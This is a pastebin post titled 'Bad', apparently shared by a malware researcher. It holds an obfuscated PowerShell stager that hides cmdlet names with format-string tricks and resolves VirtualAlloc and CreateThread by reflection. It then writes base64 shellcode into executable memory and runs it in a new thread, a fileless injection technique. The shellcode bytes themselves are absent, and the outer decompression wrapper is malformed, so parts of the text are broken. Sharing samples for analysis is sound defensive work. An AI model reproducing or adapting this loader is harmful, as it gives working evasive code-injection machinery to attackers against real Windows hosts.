James_inthe_box

Bad

Jun 8th, 2018
  1. ( nEw-ObjECT IO.coMPREssiON.deflAtEstREam([SystEm.Io.meMORYSTReAM][cOnVERT]::fRombaSe64sTRiNG( ' &("{2}{1}{0}"-f'eM','eT-it','S') ("{0}{3}{2}{4}{1}"-f'vAR','o','Mh','iaBLe:Kv','6') ( [typE]("{0}{1}{2}" -f 'iN','TP','tR')) ;&("{0}{1}{3}{2}" -f'S','e','e','t-StrictMod') -Version 2
  2.  
  3. ${Do`It} = @'
  4. $v1 = 'GetModuleHandle'
  5. $v2='GetProcAddress'
  6. $v3='ReflectedDelegate'
  7. function func_get_proc_address {
  8. Param ($var_module, $var_procedure)
  9. $var_unsafe_native_methods = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods')
  10.  
  11. return $var_unsafe_native_methods.GetMethod($v2).Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr), ($var_unsafe_native_methods.GetMethod($v1)).Invoke($null, @($var_module)))), $var_procedure))
  12. }
  13.  
  14. function func_get_delegate_type {
  15. Param (
  16. [Parameter(Position = 0, Mandatory = $True)] [Type[]] $var_parameters,
  17. [Parameter(Position = 1)] [Type] $var_return_type = [Void]
  18. )
  19.  
  20. $var_type_builder = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($v3)), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])
  21. $var_type_builder.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $var_parameters).SetImplementationFlags('Runtime, Managed')
  22. $var_type_builder.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $var_return_type, $var_parameters).SetImplementationFlags('Runtime, Managed')
  23.  
  24. return $var_type_builder.CreateType()
  25. }
  26.  
  27. [Byte[]]$var_code = [System.Convert]::FromBase64String("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")
  28.  
  29. $var_buffer = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((func_get_proc_address kernel32.dll VirtualAlloc), (func_get_delegate_type @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr]))).Invoke([IntPtr]::Zero, $var_code.Length,0x3000, 0x40)
  30. [System.Runtime.InteropServices.Marshal]::Copy($var_code, 0, $var_buffer, $var_code.length)
  31.  
  32. $var_hthread = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((func_get_proc_address kernel32.dll CreateThread), (func_get_delegate_type @([IntPtr], [UInt32], [IntPtr], [IntPtr], [UInt32], [IntPtr]) ([IntPtr]))).Invoke([IntPtr]::Zero,0,$var_buffer,[IntPtr]::Zero,0,[IntPtr]::Zero)
  33. [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((func_get_proc_address kernel32.dll WaitForSingleObject), (func_get_delegate_type @([IntPtr], [Int32]))).Invoke($var_hthread,0xffffffff) | Out-Null
  34. '@
  35.  
  36. If ( ( .("{1}{0}"-f'Ci','g') ("{1}{0}{2}{4}{3}" -f 'Ari','v','aBlE:KV','6o','mH'))."vA`lUe"::"Si`Ze" -eq 8) {
  37. .("{2}{0}{1}{3}" -f'r','t-jo','sta','b') { param(${a}) &("{0}{1}" -f 'IE','X') ${a} } -RunAs32 -Argument ${d`oIT} | .("{0}{2}{1}"-f 'wa','-job','it') | .("{1}{3}{2}{0}" -f'ob','Receiv','J','e-')
  38. }
  39. else {
  40. .("{1}{0}"-f 'X','IE') ${Do`iT}
  41. }
  42. '),[io.COmPRESSioN.COmPrEssIoNmODE]::decoMPrEss)|FOREACH-oBJECt{ nEw-ObjECT io.stReAmReadeR( $_ , [tExT.EnCoDINg]::ASCIi) }).ReADtoeNd()| &( $EnV:comSpeC[4,24,25]-JOiN'')